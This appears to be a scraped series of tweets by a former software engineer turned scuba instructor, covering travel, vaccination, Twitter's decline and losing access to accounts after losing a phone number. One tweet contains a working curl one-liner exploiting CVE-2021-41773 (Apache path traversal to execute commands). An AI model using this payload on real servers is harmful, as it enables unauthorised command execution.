Guess I’ll enjoy a few more days of comedy on this website and then it will all end. It was a great 14 years on this website. Hope to see y’all again - come dive with me! 🤿 Message me at tom@tvdw.eu if you’re interested 😉 currently in Thailand 🇹🇭.

With that said, I’m super happy that @elonmusk is making it end with a bang. These last days have been fantastic and unlike most social media websites that just slowly fade away it’s nice to have a proper ending to this one.

Nowadays I teach scuba diving and I enjoy it a lot. I don’t feel the need to open a Mastodon account just to keep up with tech. So with Twitter’s demise in the coming weeks, I will be fully disconnected from tech. 😎.

I turned 30 yesterday, but I’ve been on Twitter since I was 16. In that time I’ve become a software engineer, then senior, and left the field two years ago. Twitter is my only link back to my old job, and I try to keep updated as one day I may return to software.

Exploiting CVE-2021-41773 to execute commands is incredibly easy once mod-cgi has been enabled. curl --data "A=|id>/tmp/x" ' http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv. and "id" runs ;-)

Leaving Thailand today 😭 so I can get vaccinated in NL and then start moving again 💉💉👍. It’s been a fun few months here and I look forward to the travels later this year!.

RT @NateSilver538: If 95% of a population is fully vaccinated and vaccines reduce hospitalizations by 90%, you'd expect ~2/3 of hospitaliza….

Booked the “last” room in a hotel, got the confirmation, then a bit later I get a push notification that the hotel is now fully booked for my dates. Well yes, @agoda, I know. I did that!.

EU restricts travel from Thailand. Oh well, guess I should just stay here then. 🤷‍♂️.

Needed Server-Sent Events (SSE) for a hobby project recently. Wrote a small Rust-based webserver that handles it so I don't need the magic in the main application. Just finished open-sourcing it at Very minimal but requires almost no config/setup. :-).

Opinion: for countries that have ample vaccines available it’s unethical to allow its unvaccinated citizens to leave the country, unless they have a *medical* reason to not get the vaccine. Similarly, countries with low vaccination % shouldn’t allow inbound unvaccinated tourists.

Update: the provider eventually admitted it was probably really me, and activated the new eSIM. From there I managed to restore access to my Apple ID, giving me access to my apps. Now the rebuild begins. I definitely lost WhatsApp numbers that I didn’t add as contacts!.

I find this very amusing as I have no immediate need for the stuff on my phone. All my E2EE data is obviously lost (it's fine), and other than that I will slowly regain access anyway. When I called the phone company a few hours ago we were both just laughing about the absurdity😂.

Anyway, I don't know what the point is of me writing this all down. Thanks, security nerds (<3), for fighting SMS 2FA. I lost my phone number, and with that I lost access to virtually everything else. 🎉.

This was something I always knew could happen, and why I always bring at least two devices when I travel, where the data on one can (somewhat) recover the other. What I failed to consider is the impact of the SIM card, or in my case the eSIM, and how important a phone number is.

I'll probably manage to recover some of my access in the next couple of days. Maybe I can convince the phone company that it really is me. Plan B is to convince Apple to let me use another number, so I at least have my contacts back and can give them a temporary number?.

. the recipient of the most recent text message I sent (I know who it was but their phone number is in, you guessed it, iCloud), and the document number on the ID card I used to start the contract ~10 years ago (I have a photo of it. in iCloud).

So I call the company, and I find out that they're, like, really good at security. They refused to help until I told them I'm, like, far away. Asking me incredibly specific questions like who I called most frequently over the last months (idk let me ask my phone. oh wait), . .

I went to the phone company's website and arranged for a new eSIM. Quick download link, great! Oh, but you need to activate it, which can only be done with a verification SMS to the old card, or in person at a store. Well, the old card is gone, and the nearest store is 10000km. .
